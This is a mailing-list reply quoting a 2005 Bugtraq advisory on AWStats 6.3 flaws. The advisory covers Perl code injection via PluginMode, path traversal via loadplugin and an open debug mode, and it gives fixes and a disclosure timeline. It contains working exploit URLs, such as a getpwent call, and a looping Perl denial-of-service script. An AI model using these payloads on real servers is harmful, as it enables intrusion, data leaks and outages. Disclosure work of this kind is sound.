Re: AWStats <= 6.4 Multiple vulnerabilities
In-Reply-To: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Received: (qmail 16782 invoked from network); 14 Feb 2005 18:00:47 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com)
>(205.206.231.27)
> by mail.securityfocus.com with SMTP; 14 Feb 2005 18:00:47 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com
>[205.206.231.20])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 01F1F236F68; Mon, 14 Feb 2005 10:27:21 -0700 (MST)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 27084 invoked from network); 14 Feb 2005 00:57:36 -0000
>Date: 14 Feb 2005 08:10:40 -0000
>Message-ID: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: GHC@xxxxxxxxxxxxxxxxxxxxx,
> [ru]@securityfocus.com@www.securityfocus.com <foster@xxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: AWStats <= 6.4 Multiple vulnerabilities
>
Must read AWStats <= 6.3. Version 6.4 is not affected.
>
>
>/*==========================================*/
>// GHC -> AWStats <- ADVISORY
>\\ PRODUCT: AWStats
>// VERSION: <= 6.3
>\\ URL: http://awstats.sourceforge.net/
>// VULNERABILITY CLASS: Multiple vulnerabilities
>\\ RISK: high
>/*==========================================*/
>
>[Product Description]
>"AWStats is a free powerful tool that generates advanced web, ftp or mail
>server statistics, graphically.
>This log analyzer works as a CGI or from command line and shows you all
>possible information your log contains,
>in few graphical web pages".
>Current stable version: AWStats 6.3 final
>Development version is 6.4 - 2005-02-06 14:31
Version 6.4 release is not affected.
>
>[Summary]
>Successful exploitation of an input validation vulnerability in AWStats scripts
>allows attackers to execute limited perl directives under the privileges of
>the web server, get sensetive information.
>Some actions of the attacker can lead to denial of service.
>
>[Details]
>Some AWStats's functions can be extended with plugins.
>Two variables (loadplugin & pluginmode) are dealing with it.
>The first one (loadplugin) is responsible for plugins list (plugin1, plugin2);
>the second one
>runs plugin's functions.
>
>Exploitable example (raw log plugin):
>http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
>
>
>Server answer:
>192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1"
>500 606
>192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1"
>500 606
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css
>HTTP/1.1" 200 2986
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1"
>200 7710
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/images/logo.gif HTTP/1.1" 200 14443
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200
>429
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1"
>200 2532
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/images/vcss.gif HTTP/1.1" 200 1547
>192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1"
>200 7333
>192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1"
>200 7588
>192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1"
>200 7910
>192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1"
>200 7340
>192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200
>153
>
>The dangerous fact is that attacker can read sensitive information such as
>IP address, admin scripts names, non encoded GET queries, etc.
>
>Our variables pass some verification (as others), but it is not enough for
>security:
>
>sub Sanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
> return $stringtoclean;
>}
>
>Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.
>It's enough for variables with path to configuration files, but not for plugin
>tasks.
>In case of "loadplugin" & "pluginmode" developers obviously have a lot of
>trust to the user.
>
>So, let's see what can be done, in fact.
>
>[1] Perl code execution.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>we'll get the action in next piece of code:
>
># AWStats output is replaced by a plugin output
>if ($PluginMode) {
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
> if ($? || $@) { error("$@"); }
> &html_end(0);
> exit 0;
>}
>
>If variable exists, we'll get code execution. This happens after sanitizing
>(see privious).
>Here we have intresting part in:
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
>
>This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from
>rawlog.pm plugin).
>Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
>But if we won't specify the name of module (with "loadplugin" parameter) we'll
>get the next:
>
>main::BuildFullHTMLOutput_"function name"().
>
>By the way, there is permited symbol ':' in user input parameters. So, we can
>send:
>
>PluginMode=:print+getpwent
>
>And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>This will satisfy eval() requirements., and :print getpwent() is executed.
>
>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>Sanitazing limits user's input, but there is no filtration for call sympols
>'()'.
>Here we can see that somebody can perform DoS attack.
>This is example of simple code for successful DoS exploitation:
>
>#!/usr/bin/perl
>
>use IO::Socket;
>$server = 'www.example.com';
>sub ConnectServer {
> $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
> PeerPort => "80")
> || die "Error\n";
> print $socket "GET
> /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
> print $socket "Host: $server\n";
> print $socket "Accept: */*\n";
> print $socket "\n\n";
>}
>
>while () {
> $rp = rand;
> &ConnectServer;
>}
>
>[BUGFIX]
>Change vulnerable code for:
>
>sub PluginSanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w]//g;
> return $stringtoclean;
>}
>
>
>[2] Arbitrary plugin including.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
>
>Arbitrary module from user's input through "loadplugin" parameter can be
>included with "require" function..
>
>Bugfix - as above or something like this:
>
>opendir (PDIR, './plugins');
>@FilesPDIR = readdir(PDIR);
>closedir (PDIR);
>foreach $FilesPName (@FilesPDIR) {
> if ($FilesPName =~ m/$loadplugin/) {
> }
>}
>
>The good thing is the poison null-byte (%00) has no place (transferes to 00).
>
>[3] Sensetive information leak in AWStats version 6.3(Stable) -
>6.4(Development).
>Every user can access debug function:
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
>
>
>[DISCLOSURE TIMELINE]
>
>10-02-2005 Initial vendor notification.
>14-02-2005 No response.
>14-02-2005 Bug-traq post.
>
>/* ================================================== */
>/* www.ghc.ru -- security games & challenges */
>/* ================================================== */
>/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
>/* Special respect to e-defense. */
>/* ================================================== */
>